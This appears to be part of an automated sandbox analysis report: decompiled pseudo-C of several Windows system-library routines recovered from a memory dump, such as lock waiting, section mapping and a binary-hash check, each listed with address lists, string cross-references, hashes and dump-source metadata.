0x02abfb1b
0x02abfb1d
0x02abfb1e
0x02abfb1f
0x02abfb20
0x02abfb21
0x02abfb22
0x02abfb23
0x02abfb24
0x02abfb25
0x02abfb26
0x02abfb27
0x02abfb28
0x02abfb29
0x02abfb2a
0x02abfb2b
0x02abfb2c
0x02abfb2d
0x02abfb2e
0x02abfb2f
0x02abfb3a
0x02abfb3b
0x02abfb3e
0x02abfb41
0x02abfb44
0x02abfb47
0x02abfb4a
0x02abfb4d
0x02abfb53
0x02afbdcb
0x02afbdcb
0x02abfb59
0x02abfb5b
0x02abfb5b
0x02abfb5e
0x02afbdd5
0x02afbdd8
0x00000000
0x02afbdda
0x00000000
0x02afbdda
0x02abfb64
0x02abfb64
0x02abfb64
0x02abfb67
0x02abfb6e
0x02abfb70
0x02abfb72
0x00000000
0x02abfb78
0x02abfb7a
0x02abfb7a
0x02abfb7d
0x02abfb80
0x02afbddf
0x02afbde1
0x00000000
0x02afbde3
0x00000000
0x02afbde3
0x02abfb86
0x02abfb86
0x02abfb86
0x02abfb8b
0x02abfb90
0x02abfb92
0x02abfb94
0x02abfb9a
0x02abfb9b
0x02abfba1
0x02afbde8
0x02afbdeb
0x02afbded
0x02afbeb5
0x02afbeb5
0x02afbebb
0x02afbebd
0x02afbec3
0x02afbed2
0x02afbedd
0x02afbedd
0x02afbeed
0x00000000
0x02afbdf3
0x02afbdfe
0x02afbe06
0x02afbe0b
0x02afbe0d
0x02afbe0f
0x02afbe14
0x02afbe19
0x02afbe20
0x02afbe25
0x02afbe27
0x02afbe35
0x02afbe39
0x02afbe46
0x02afbe4f
0x02afbe54
0x02afbe56
0x02afbef8
0x02afbef8
0x00000000
0x02afbe5c
0x02afbe5c
0x02afbe60
0x00000000
0x02afbe66
0x02afbe66
0x02afbe7f
0x02afbe84
0x02afbe87
0x02afbe89
0x02afbe8b
0x02afbe99
0x02afbe9d
0x02afbea0
0x02afbeac
0x02afbeaf
0x02afbeb1
0x02afbeb3
0x02afbeb3
0x00000000
0x02afbea2
0x02afbea2
0x00000000
0x02afbea2
0x02afbe8d
0x02afbe8d
0x02afbe92
0x00000000
0x02afbe92
0x02afbe8b
0x02afbe60
0x02afbe3b
0x02afbe3b
0x02afbe3e
0x00000000
0x02afbe40
0x02afbe40
0x02afbe44
0x00000000
0x00000000
0x00000000
0x00000000
0x02afbe44
0x02afbe3e
0x02afbe29
0x02afbe29
0x00000000
0x02afbe29
0x02afbe27
0x00000000
0x02abfba7
0x02abfba7
0x02abfbab
0x02afbf02
0x02abfbb1
0x02abfbb1
0x02abfbb8
0x02abfbbd
0x02abfbbd
0x02abfbbf
0x02abfbbf
0x02abfbc5
0x02abfbcb
0x02abfbf8
0x02abfbf8
0x02abfbfa
0x00000000
0x02abfc00
0x02abfc00
0x02abfc03
0x00000000
0x02abfc09
0x02abfc09
0x02abfc0f
0x02abfc15
0x02abfc23
0x02abfc23
0x02abfc25
0x02abfc27
0x02abfc75
0x02abfc7c
0x02abfc84
0x00000000
0x02abfc29
0x02abfc29
0x02abfc2d
0x02abfc30
0x02afbf0f
0x00000000
0x02abfc36
0x02abfc38
0x02abfc3b
0x02abfc41
0x02afbf17
0x02afbf19
0x02afbf48
0x02afbf4b
0x00000000
0x02afbf1b
0x02afbf22
0x02afbf24
0x02afbf26
0x00000000
0x02afbf2c
0x02afbf37
0x02afbf39
0x02afbf3b
0x00000000
0x02afbf41
0x02afbf41
0x02afbf41
0x02afbf41
0x02afbf45
0x00000000
0x02afbf45
0x02afbf3b
0x02afbf26
0x00000000
0x02abfc47
0x02abfc47
0x02abfc49
0x02abfcb2
0x02abfcb4
0x02abfcb6
0x02abfcdc
0x02abfcdc
0x00000000
0x02abfcb8
0x02abfcc3
0x02abfcc5
0x02abfcc7
0x00000000
0x02abfcc9
0x02abfcc9
0x02abfccd
0x00000000
0x02abfccd
0x02abfcc7
0x00000000
0x02abfc4b
0x02abfc4b
0x02abfc4e
0x02abfc4e
0x02abfc51
0x02abfc51
0x02abfc54
0x02abfc5a
0x02abfc5c
0x02abfc5f
0x02abfc61
0x02abfc63
0x02abfc65
0x02abfc67
0x02abfc6e
0x02abfc72
0x02abfc72
0x02abfc72
0x02abfc72
0x02abfc67
0x02abfc61
0x00000000
0x02abfc5a
0x02abfc49
0x02abfc41
0x02abfc30
0x02abfc27
0x02abfc03
0x02abfbcd
0x02abfbd3
0x02abfbd9
0x02abfbdc
0x02abfbde
0x02abfc99
0x02abfc9b
0x02abfc9d
0x02abfcd5
0x02abfcd5
0x02abfc89
0x02abfc89
0x00000000
0x02abfc9f
0x02abfc9f
0x02abfca3
0x00000000
0x02abfca3
0x00000000
0x02abfbe4
0x02abfbe4
0x02abfbe4
0x02abfbe4
0x02abfbe9
0x02abfbf2
0x00000000
0x02abfbf2
0x02abfbde
0x02abfbcb
0x02abfbab
0x02abfc8b
0x02abfc8b
0x02abfc8c
0x02abfb80
0x02abfb72
0x02abfb5e
0x02abfc8d
0x02abfc91
0x02abfadf
0x02abfadf
0x02abfae1
0x02abfae4
0x02abfae7
0x02abfaec
0x02abfaf8
0x02abfb00
0x02abfb07
0x02abfb0f
0x02abfb0f
0x02abfb07
0x00000000
0x02abfaf8
0x02abfadd

Strings

*** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!, xrefs: 02AFBE0F

Memory Dump Source

Source File: 00000009.00000002.926211306.0000000002A60000.00000040.00000001.sdmp, Offset: 02A60000, based on PE: true

Associated: 00000009.00000002.926381151.0000000002B7B000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.926396887.0000000002B7F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID: *** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!
API String ID: 0-865735534
Opcode ID: 17abb1e30a1434dc3999c4df09146599da489ce68769c7c64d53bd7c860f12f1
Instruction ID: 71f863e61f64f1bf5794e08c7e32c86cdc80e096d1020c87f8cd8db2df530ecd
Opcode Fuzzy Hash: 17abb1e30a1434dc3999c4df09146599da489ce68769c7c64d53bd7c860f12f1
Instruction Fuzzy Hash: 14A13A71B00705CFDB66CB64C8907BAB3B9AF49719F084969F905CBA82EF34D841CB90

Uniqueness

Uniqueness Score: -1.00%

Function 02A82D8A, Relevance: 1.4, Strings: 1, Instructions: 191
COMMON

Download Yara Rule

C-Code - Quality: 63%

			E02A82D8A(void* __ebx, signed char __ecx, signed int __edx, signed int __edi) {
				signed char _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				signed int _v52;
				void* __esi;
				void* __ebp;
				intOrPtr _t55;
				signed int _t57;
				signed int _t58;
				char* _t62;
				signed char* _t63;
				signed char* _t64;
				signed int _t67;
				signed int _t72;
				signed int _t77;
				signed int _t78;
				signed int _t88;
				intOrPtr _t89;
				signed char _t93;
				signed int _t97;
				signed int _t98;
				signed int _t102;
				signed int _t103;
				intOrPtr _t104;
				signed int _t105;
				signed int _t106;
				signed char _t109;
				signed int _t111;
				void* _t116;

				_t102 = __edi;
				_t97 = __edx;
				_v12 = _v12 & 0x00000000;
				_t55 =  *[fs:0x18];
				_t109 = __ecx;
				_v8 = __edx;
				_t86 = 0;
				_v32 = _t55;
				_v24 = 0;
				_push(__edi);
				if(__ecx == 0x2b75350) {
					_t86 = 1;
					_v24 = 1;
					 *((intOrPtr*)(_t55 + 0xf84)) = 1;
				}
				_t103 = _t102 | 0xffffffff;
				if( *0x2b77bc8 != 0) {
					_push(0xc000004b);
					_push(_t103);
					E02AC97C0();
				}
				if( *0x2b779c4 != 0) {
					_t57 = 0;
				} else {
					_t57 = 0x2b779c8;
				}
				_v16 = _t57;
				if( *((intOrPtr*)(_t109 + 0x10)) == 0) {
					_t93 = _t109;
					L23();
				}
				_t58 =  *_t109;
				if(_t58 == _t103) {
					__eflags =  *(_t109 + 0x14) & 0x01000000;
					_t58 = _t103;
					if(__eflags == 0) {
						_t93 = _t109;
						E02AB1624(_t86, __eflags);
						_t58 =  *_t109;
					}
				}
				_v20 = _v20 & 0x00000000;
				if(_t58 != _t103) {
					 *((intOrPtr*)(_t58 + 0x14)) =  *((intOrPtr*)(_t58 + 0x14)) + 1;
				}
				_t104 =  *((intOrPtr*)(_t109 + 0x10));
				_t88 = _v16;
				_v28 = _t104;
				L9:
				while(1) {
					if(E02AA7D50() != 0) {
						_t62 = ( *[fs:0x30])[0x50] + 0x228;
					} else {
						_t62 = 0x7ffe0382;
					}
					if( *_t62 != 0) {
						_t63 =  *[fs:0x30];
						__eflags = _t63[0x240] & 0x00000002;
						if((_t63[0x240] & 0x00000002) != 0) {
							_t93 = _t109;
							E02B1FE87(_t93);
						}
					}
					if(_t104 != 0xffffffff) {
						_push(_t88);
						_push(0);
						_push(_t104);
						_t64 = E02AC9520();
						goto L15;
					} else {
						while(1) {
							_t97 =  &_v8;
							_t64 = E02ABE18B(_t109 + 4, _t97, 4, _t88, 0);
							if(_t64 == 0x102) {
								break;
							}
							_t93 =  *(_t109 + 4);
							_v8 = _t93;
							if((_t93 & 0x00000002) != 0) {
								continue;
							}
							L15:
							if(_t64 == 0x102) {
								break;
							}
							_t89 = _v24;
							if(_t64 < 0) {
								L02ADDF30(_t93, _t97, _t64);
								_push(_t93);
								_t98 = _t97 | 0xffffffff;
								__eflags =  *0x2b76901;
								_push(_t109);
								_v52 = _t98;
								if( *0x2b76901 != 0) {
									_push(0);
									_push(1);
									_push(0);
									_push(0x100003);
									_push( &_v12);
									_t72 = E02AC9980();
									__eflags = _t72;
									if(_t72 < 0) {
										_v12 = _t98 | 0xffffffff;
									}
								}
								asm("lock cmpxchg [ecx], edx");
								_t111 = 0;
								__eflags = 0;
								if(0 != 0) {
									__eflags = _v12 - 0xffffffff;
									if(_v12 != 0xffffffff) {
										_push(_v12);
										E02AC95D0();
									}
								} else {
									_t111 = _v12;
								}
								return _t111;
							} else {
								if(_t89 != 0) {
									 *((intOrPtr*)(_v32 + 0xf84)) = 0;
									_t77 = E02AA7D50();
									__eflags = _t77;
									if(_t77 == 0) {
										_t64 = 0x7ffe0384;
									} else {
										_t64 = ( *[fs:0x30])[0x50] + 0x22a;
									}
									__eflags =  *_t64;
									if( *_t64 != 0) {
										_t64 =  *[fs:0x30];
										__eflags = _t64[0x240] & 0x00000004;
										if((_t64[0x240] & 0x00000004) != 0) {
											_t78 = E02AA7D50();
											__eflags = _t78;
											if(_t78 == 0) {
												_t64 = 0x7ffe0385;
											} else {
												_t64 = ( *[fs:0x30])[0x50] + 0x22b;
											}
											__eflags =  *_t64 & 0x00000020;
											if(( *_t64 & 0x00000020) != 0) {
												_t64 = E02B07016(0x1483, _t97 | 0xffffffff, 0xffffffff, 0xffffffff, 0, 0);
											}
										}
									}
								}
								return _t64;
							}
						}
						_t97 = _t88;
						_t93 = _t109;
						E02B1FDDA(_t97, _v12);
						_t105 =  *_t109;
						_t67 = _v12 + 1;
						_v12 = _t67;
						__eflags = _t105 - 0xffffffff;
						if(_t105 == 0xffffffff) {
							_t106 = 0;
							__eflags = 0;
						} else {
							_t106 =  *(_t105 + 0x14);
						}
						__eflags = _t67 - 2;
						if(_t67 > 2) {
							__eflags = _t109 - 0x2b75350;
							if(_t109 != 0x2b75350) {
								__eflags = _t106 - _v20;
								if(__eflags == 0) {
									_t93 = _t109;
									E02B1FFB9(_t88, _t93, _t97, _t106, _t109, __eflags);
								}
							}
						}
						_push("RTL: Re-Waiting\n");
						_push(0);
						_push(0x65);
						_v20 = _t106;
						E02B15720();
						_t104 = _v28;
						_t116 = _t116 + 0xc;
						continue;
					}
				}
			}

0x02a82d8a
0x02a82d8a
0x02a82d92
0x02a82d96
0x02a82d9e
0x02a82da0
0x02a82da3
0x02a82da5
0x02a82da8
0x02a82dab
0x02a82db2
0x02adf9aa
0x02adf9ab
0x02adf9ae
0x02adf9ae
0x02a82db8
0x02a82dc2
0x02adf9b9
0x02adf9be
0x02adf9bf
0x02adf9bf
0x02a82dcf
0x02adf9c9
0x02a82dd5
0x02a82dd5
0x02a82dd5
0x02a82dde
0x02a82de1
0x02a82e70
0x02a82e72
0x02a82e72
0x02a82de7
0x02a82deb
0x02a82e7c
0x02a82e83
0x02a82e85
0x02a82e8b
0x02a82e8d
0x02a82e92
0x02a82e92
0x02a82e85
0x02a82df1
0x02a82df7
0x02a82df9
0x02a82df9
0x02a82dfc
0x02a82dff
0x02a82e02
0x00000000
0x02a82e05
0x02a82e0c
0x02adf9d9
0x02a82e12
0x02a82e12
0x02a82e12
0x02a82e1a
0x02adf9e3
0x02adf9e9
0x02adf9f0
0x02adf9f6
0x02adf9f8
0x02adf9f8
0x02adf9f0
0x02a82e23
0x02adfa02
0x02adfa03
0x02adfa05
0x02adfa06
0x00000000
0x02a82e29
0x02a82e29
0x02a82e2e
0x02a82e34
0x02a82e3e
0x00000000
0x00000000
0x02a82e44
0x02a82e47
0x02a82e4d
0x00000000
0x00000000
0x02a82e4f
0x02a82e54
0x00000000
0x00000000
0x02a82e5a
0x02a82e5f
0x02a82e9a
0x02a82ea4
0x02a82ea5
0x02a82ea8
0x02a82eaf
0x02a82eb2
0x02a82eb5
0x02adfae9
0x02adfaeb
0x02adfaed
0x02adfaef
0x02adfaf7
0x02adfaf8
0x02adfafd
0x02adfaff
0x02adfb04
0x02adfb04
0x02adfaff
0x02a82ec0
0x02a82ec4
0x02a82ec6
0x02a82ec8
0x02adfb14
0x02adfb18
0x02adfb1e
0x02adfb21
0x02adfb21
0x02a82ece
0x02a82ece
0x02a82ece
0x02a82ed7
0x02a82e61
0x02a82e63
0x02adfa6b
0x02adfa71
0x02adfa76
0x02adfa78
0x02adfa8a
0x02adfa7a
0x02adfa83
0x02adfa83
0x02adfa8f
0x02adfa91
0x02adfa97
0x02adfa9d
0x02adfaa4
0x02adfaaa
0x02adfaaf
0x02adfab1
0x02adfac3
0x02adfab3
0x02adfabc
0x02adfabc
0x02adfac8
0x02adfacb
0x02adfadf
0x02adfadf
0x02adfacb
0x02adfaa4
0x02adfa91
0x02a82e6f
0x02a82e6f
0x02a82e5f
0x02adfa13
0x02adfa15
0x02adfa17
0x02adfa1f
0x02adfa21
0x02adfa22
0x02adfa25
0x02adfa28
0x02adfa2f
0x02adfa2f
0x02adfa2a
0x02adfa2a
0x02adfa2a
0x02adfa31
0x02adfa34
0x02adfa36
0x02adfa3c
0x02adfa3e
0x02adfa41
0x02adfa43
0x02adfa45
0x02adfa45
0x02adfa41
0x02adfa3c
0x02adfa4a
0x02adfa4f
0x02adfa51
0x02adfa53
0x02adfa56
0x02adfa5b
0x02adfa5e
0x00000000
0x02adfa5e
0x02a82e23

Strings

RTL: Re-Waiting, xrefs: 02ADFA4A

Memory Dump Source

Source File: 00000009.00000002.926211306.0000000002A60000.00000040.00000001.sdmp, Offset: 02A60000, based on PE: true

Associated: 00000009.00000002.926381151.0000000002B7B000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.926396887.0000000002B7F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID: RTL: Re-Waiting
API String ID: 0-316354757
Opcode ID: 65fd1e7e1bdf3ce10a9fae8e8b6b31deff1fcabb66d9f38116217a1cf502ae10
Instruction ID: 6a3735b8dfbf86363aa53f5486ab28c24bd347bd88012ddb350a14f2cda067ff
Opcode Fuzzy Hash: 65fd1e7e1bdf3ce10a9fae8e8b6b31deff1fcabb66d9f38116217a1cf502ae10
Instruction Fuzzy Hash: 8D610731A40684AFDB31EB68C884B7FBBB5EB44714F1446AAD813D76E0DF349941CB91

Uniqueness

Uniqueness Score: -1.00%

Function 02B50EA5, Relevance: 1.4, Strings: 1, Instructions: 153
COMMON

Download Yara Rule

C-Code - Quality: 80%

			E02B50EA5(void* __ecx, void* __edx) {
				signed int _v20;
				char _v24;
				intOrPtr _v28;
				unsigned int _v32;
				signed int _v36;
				intOrPtr _v40;
				char _v44;
				intOrPtr _v64;
				void* __ebx;
				void* __edi;
				signed int _t58;
				unsigned int _t60;
				intOrPtr _t62;
				char* _t67;
				char* _t69;
				void* _t80;
				void* _t83;
				intOrPtr _t93;
				intOrPtr _t115;
				char _t117;
				void* _t120;

				_t83 = __edx;
				_t117 = 0;
				_t120 = __ecx;
				_v44 = 0;
				if(E02B4FF69(__ecx,  &_v44,  &_v32) < 0) {
					L24:
					_t109 = _v44;
					if(_v44 != 0) {
						E02B51074(_t83, _t120, _t109, _t117, _t117);
					}
					L26:
					return _t117;
				}
				_t93 =  *((intOrPtr*)(__ecx + 0x3c));
				_t5 = _t83 + 1; // 0x1
				_v36 = _t5 << 0xc;
				_v40 = _t93;
				_t58 =  *(_t93 + 0xc) & 0x40000000;
				asm("sbb ebx, ebx");
				_t83 = ( ~_t58 & 0x0000003c) + 4;
				if(_t58 != 0) {
					_push(0);
					_push(0x14);
					_push( &_v24);
					_push(3);
					_push(_t93);
					_push(0xffffffff);
					_t80 = E02AC9730();
					_t115 = _v64;
					if(_t80 < 0 || (_v20 & 0x00000060) == 0 || _v24 != _t115) {
						_push(_t93);
						E02B4A80D(_t115, 1, _v20, _t117);
						_t83 = 4;
					}
				}
				if(E02B4A854( &_v44,  &_v36, _t117, 0x40001000, _t83, _t117,  *((intOrPtr*)(_t120 + 0x34)),  *((intOrPtr*)(_t120 + 0x38))) < 0) {
					goto L24;
				}
				_t60 = _v32;
				_t97 = (_t60 != 0x100000) + 1;
				_t83 = (_v44 -  *0x2b78b04 >> 0x14) + (_v44 -  *0x2b78b04 >> 0x14);
				_v28 = (_t60 != 0x100000) + 1;
				_t62 = _t83 + (_t60 >> 0x14) * 2;
				_v40 = _t62;
				if(_t83 >= _t62) {
					L10:
					asm("lock xadd [eax], ecx");
					asm("lock xadd [eax], ecx");
					if(E02AA7D50() == 0) {
						_t67 = 0x7ffe0380;
					} else {
						_t67 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
					}
					if( *_t67 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
						E02B4138A(_t83,  *((intOrPtr*)(_t120 + 0x3c)), _v44, _v36, 0xc);
					}
					if(E02AA7D50() == 0) {
						_t69 = 0x7ffe0388;
					} else {
						_t69 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
					}
					if( *_t69 != 0) {
						E02B3FEC0(_t83,  *((intOrPtr*)(_t120 + 0x3c)), _v44, _v32);
					}
					if(( *0x2b78724 & 0x00000008) != 0) {
						E02B452F8( *((intOrPtr*)(_t120 + 0x3c)),  *((intOrPtr*)(_t120 + 0x28)));
					}
					_t117 = _v44;
					goto L26;
				}
				while(E02B515B5(0x2b78ae4, _t83, _t97, _t97) >= 0) {
					_t97 = _v28;
					_t83 = _t83 + 2;
					if(_t83 < _v40) {
						continue;
					}
					goto L10;
				}
				goto L24;
			}

0x02b50eb7
0x02b50eb9
0x02b50ec0
0x02b50ec2
0x02b50ecd
0x02b5105b
0x02b5105b
0x02b51061
0x02b51066
0x02b51066
0x02b5106b
0x02b51073
0x02b51073
0x02b50ed3
0x02b50ed6
0x02b50edc
0x02b50ee0
0x02b50ee7
0x02b50ef0
0x02b50ef5
0x02b50efa
0x02b50efc
0x02b50efd
0x02b50f03
0x02b50f04
0x02b50f06
0x02b50f07
0x02b50f09
0x02b50f0e
0x02b50f14
0x02b50f23
0x02b50f2d
0x02b50f34
0x02b50f34
0x02b50f14
0x02b50f52
0x00000000
0x00000000
0x02b50f58
0x02b50f73
0x02b50f74
0x02b50f79
0x02b50f7d
0x02b50f80
0x02b50f86
0x02b50fab
0x02b50fb5
0x02b50fc6
0x02b50fd1
0x02b50fe3
0x02b50fd3
0x02b50fdc
0x02b50fdc
0x02b50feb
0x02b51009
0x02b51009
0x02b51015
0x02b51027
0x02b51017
0x02b51020
0x02b51020
0x02b5102f
0x02b5103c
0x02b5103c
0x02b51048
0x02b51050
0x02b51050
0x02b51055
0x00000000
0x02b51055
0x02b50f88
0x02b50f9e
0x02b50fa2
0x02b50fa9
0x00000000
0x00000000
0x00000000
0x02b50fa9
0x00000000

Strings

`, xrefs: 02B50F16

Memory Dump Source

Source File: 00000009.00000002.926211306.0000000002A60000.00000040.00000001.sdmp, Offset: 02A60000, based on PE: true

Associated: 00000009.00000002.926381151.0000000002B7B000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.926396887.0000000002B7F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID: `
API String ID: 0-2679148245
Opcode ID: 6e423e3d5865e5a8436b27a9ff707a677d2b41b993ac2a19b6cca59c96153ba0
Instruction ID: 9192d0f27b389d29f13fc9a17e235e5eb93590be4b922664c2d6de93d345bd14
Opcode Fuzzy Hash: 6e423e3d5865e5a8436b27a9ff707a677d2b41b993ac2a19b6cca59c96153ba0
Instruction Fuzzy Hash: C55181712043419FD725EF18D984B1BB7E5EFC8704F0409ACF9569B290DB71E805CB61

Uniqueness

Uniqueness Score: -1.00%

Function 02ABF0BF, Relevance: 1.4, Strings: 1, Instructions: 137
COMMON

Download Yara Rule

C-Code - Quality: 75%

			E02ABF0BF(signed short* __ecx, signed short __edx, void* __eflags, intOrPtr* _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				char* _v20;
				intOrPtr _v24;
				char _v28;
				intOrPtr _v32;
				char _v36;
				char _v44;
				char _v52;
				intOrPtr _v56;
				char _v60;
				intOrPtr _v72;
				void* _t51;
				void* _t58;
				signed short _t82;
				short _t84;
				signed int _t91;
				signed int _t100;
				signed short* _t103;
				void* _t108;
				intOrPtr* _t109;

				_t103 = __ecx;
				_t82 = __edx;
				_t51 = E02AA4120(0, __ecx, 0,  &_v52, 0, 0, 0);
				if(_t51 >= 0) {
					_push(0x21);
					_push(3);
					_v56 =  *0x7ffe02dc;
					_v20 =  &_v52;
					_push( &_v44);
					_v28 = 0x18;
					_push( &_v28);
					_push(0x100020);
					_v24 = 0;
					_push( &_v60);
					_v16 = 0x40;
					_v12 = 0;
					_v8 = 0;
					_t58 = E02AC9830();
					_t87 =  *[fs:0x30];
					_t108 = _t58;
					L02AA77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v72);
					if(_t108 < 0) {
						L11:
						_t51 = _t108;
					} else {
						_push(4);
						_push(8);
						_push( &_v36);
						_push( &_v44);
						_push(_v60);
						_t108 = E02AC9990();
						if(_t108 < 0) {
							L10:
							_push(_v60);
							E02AC95D0();
							goto L11;
						} else {
							_t109 = L02AA4620(_t87,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t82 + 0x18);
							if(_t109 == 0) {
								_t108 = 0xc0000017;
								goto L10;
							} else {
								_t21 = _t109 + 0x18; // 0x18
								 *((intOrPtr*)(_t109 + 4)) = _v60;
								 *_t109 = 1;
								 *((intOrPtr*)(_t109 + 0x10)) = _t21;
								 *(_t109 + 0xe) = _t82;
								 *((intOrPtr*)(_t109 + 8)) = _v56;
								 *((intOrPtr*)(_t109 + 0x14)) = _v32;
								E02ACF3E0(_t21, _t103[2],  *_t103 & 0x0000ffff);
								 *((short*)( *((intOrPtr*)(_t109 + 0x10)) + (( *_t103 & 0x0000ffff) >> 1) * 2)) = 0;
								 *((short*)(_t109 + 0xc)) =  *_t103;
								_t91 =  *_t103 & 0x0000ffff;
								_t100 = _t91 & 0xfffffffe;
								_t84 = 0x5c;
								if( *((intOrPtr*)(_t103[2] + _t100 - 2)) != _t84) {
									if(_t91 + 4 > ( *(_t109 + 0xe) & 0x0000ffff)) {
										_push(_v60);
										E02AC95D0();
										L02AA77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t109);
										_t51 = 0xc0000106;
									} else {
										 *((short*)(_t100 +  *((intOrPtr*)(_t109 + 0x10)))) = _t84;
										 *((short*)( *((intOrPtr*)(_t109 + 0x10)) + 2 + (( *_t103 & 0x0000ffff) >> 1) * 2)) = 0;
										 *((short*)(_t109 + 0xc)) =  *((short*)(_t109 + 0xc)) + 2;
										goto L5;
									}
								} else {
									L5:
									 *_a4 = _t109;
									_t51 = 0;
								}
							}
						}
					}
				}
				return _t51;
			}

0x02abf0d3
0x02abf0d9
0x02abf0e0
0x02abf0e7
0x02abf0f2
0x02abf0f4
0x02abf0f8
0x02abf100
0x02abf108
0x02abf10d
0x02abf115
0x02abf116
0x02abf11f
0x02abf123
0x02abf124
0x02abf12c
0x02abf130
0x02abf134
0x02abf13d
0x02abf144
0x02abf14b
0x02abf152
0x02afbab0
0x02afbab0
0x02abf158
0x02abf158
0x02abf15a
0x02abf160
0x02abf165
0x02abf166
0x02abf16f
0x02abf173
0x02afbaa7
0x02afbaa7
0x02afbaab
0x00000000
0x02abf179
0x02abf18d
0x02abf191
0x02afbaa2
0x00000000
0x02abf197
0x02abf19b
0x02abf1a2
0x02abf1a9
0x02abf1af
0x02abf1b2
0x02abf1b6
0x02abf1b9
0x02abf1c4
0x02abf1d8
0x02abf1df
0x02abf1e3
0x02abf1eb
0x02abf1ee
0x02abf1f4
0x02abf20f
0x02afbab7
0x02afbabb
0x02afbacc
0x02afbad1
0x02abf215
0x02abf218
0x02abf226
0x02abf22b
0x00000000
0x02abf22b
0x02abf1f6
0x02abf1f6
0x02abf1f9
0x02abf1fb
0x02abf1fb
0x02abf1f4
0x02abf191
0x02abf173
0x02abf152
0x02abf203

Strings

@, xrefs: 02ABF124

Memory Dump Source

Source File: 00000009.00000002.926211306.0000000002A60000.00000040.00000001.sdmp, Offset: 02A60000, based on PE: true

Associated: 00000009.00000002.926381151.0000000002B7B000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.926396887.0000000002B7F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID: @
API String ID: 0-2766056989
Opcode ID: 4b412e15f740e7d19b187a206102b9820fe056b1c8be356b654954a4ccb32fe9
Instruction ID: d201a17660c63848a6301235601f4f72b0d43bd9c5f6ba00f4beb49534812847
Opcode Fuzzy Hash: 4b412e15f740e7d19b187a206102b9820fe056b1c8be356b654954a4ccb32fe9
Instruction Fuzzy Hash: A3519C71504711AFC321DF69C940A6BB7F9FF48714F10892EFA9587690EBB4E904CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 02B03540, Relevance: 1.4, Strings: 1, Instructions: 130
COMMON

Download Yara Rule

C-Code - Quality: 75%

			E02B03540(intOrPtr _a4) {
				signed int _v12;
				intOrPtr _v88;
				intOrPtr _v92;
				char _v96;
				char _v352;
				char _v1072;
				intOrPtr _v1140;
				intOrPtr _v1148;
				char _v1152;
				char _v1156;
				char _v1160;
				char _v1164;
				char _v1168;
				char* _v1172;
				short _v1174;
				char _v1176;
				char _v1180;
				char _v1192;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				short _t41;
				short _t42;
				intOrPtr _t80;
				intOrPtr _t81;
				signed int _t82;
				void* _t83;

				_v12 =  *0x2b7d360 ^ _t82;
				_t41 = 0x14;
				_v1176 = _t41;
				_t42 = 0x16;
				_v1174 = _t42;
				_v1164 = 0x100;
				_v1172 = L"BinaryHash";
				_t81 = E02AC0BE0(0xfffffffc,  &_v352,  &_v1164, 0, 0, 0,  &_v1192);
				if(_t81 < 0) {
					L11:
					_t75 = _t81;
					E02B03706(0, _t81, _t79, _t80);
					L12:
					if(_a4 != 0xc000047f) {
						E02ACFA60( &_v1152, 0, 0x50);
						_v1152 = 0x60c201e;
						_v1148 = 1;
						_v1140 = E02B03540;
						E02ACFA60( &_v1072, 0, 0x2cc);
						_push( &_v1072);
						E02ADDDD0( &_v1072, _t75, _t79, _t80, _t81);
						E02B10C30(0, _t75, _t80,  &_v1152,  &_v1072, 2);
						_push(_v1152);
						_push(0xffffffff);
						E02AC97C0();
					}
					return E02ACB640(0xc0000135, 0, _v12 ^ _t82, _t79, _t80, _t81);
				}
				_t79 =  &_v352;
				_t81 = E02B03971(0, _a4,  &_v352,  &_v1156);
				if(_t81 < 0) {
					goto L11;
				}
				_t75 = _v1156;
				_t79 =  &_v1160;
				_t81 = E02B03884(_v1156,  &_v1160,  &_v1168);
				if(_t81 >= 0) {
					_t80 = _v1160;
					E02ACFA60( &_v96, 0, 0x50);
					_t83 = _t83 + 0xc;
					_push( &_v1180);
					_push(0x50);
					_push( &_v96);
					_push(2);
					_push( &_v1176);
					_push(_v1156);
					_t81 = E02AC9650();
					if(_t81 >= 0) {
						if(_v92 != 3 || _v88 == 0) {
							_t81 = 0xc000090b;
						}
						if(_t81 >= 0) {
							_t75 = _a4;
							_t79 =  &_v352;
							E02B03787(_a4,  &_v352, _t80);
						}
					}
					L02AA77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v1168);
				}
				_push(_v1156);
				E02AC95D0();
				if(_t81 >= 0) {
					goto L12;
				} else {
					goto L11;
				}
			}

0x02b03552
0x02b0355a
0x02b0355d
0x02b03566
0x02b03567
0x02b0357e
0x02b0358f
0x02b035a1
0x02b035a5
0x02b0366b
0x02b0366b
0x02b0366d
0x02b03672
0x02b03679
0x02b03685
0x02b0368d
0x02b0369d
0x02b036a7
0x02b036b8
0x02b036c6
0x02b036c7
0x02b036dc
0x02b036e1
0x02b036e7
0x02b036e9
0x02b036e9
0x02b03703
0x02b03703
0x02b035b5
0x02b035c0
0x02b035c4
0x00000000
0x00000000
0x02b035ca
0x02b035d7
0x02b035e2
0x02b035e6
0x02b035e8
0x02b035f5
0x02b035fa
0x02b03603
0x02b03604
0x02b03609
0x02b0360a
0x02b03612
0x02b03613
0x02b0361e
0x02b03622
0x02b03628
0x02b0362f
0x02b0362f
0x02b03636
0x02b03638
0x02b0363b
0x02b03642
0x02b03642
0x02b03636
0x02b03657
0x02b03657
0x02b0365c
0x02b03662
0x02b03669
0x00000000
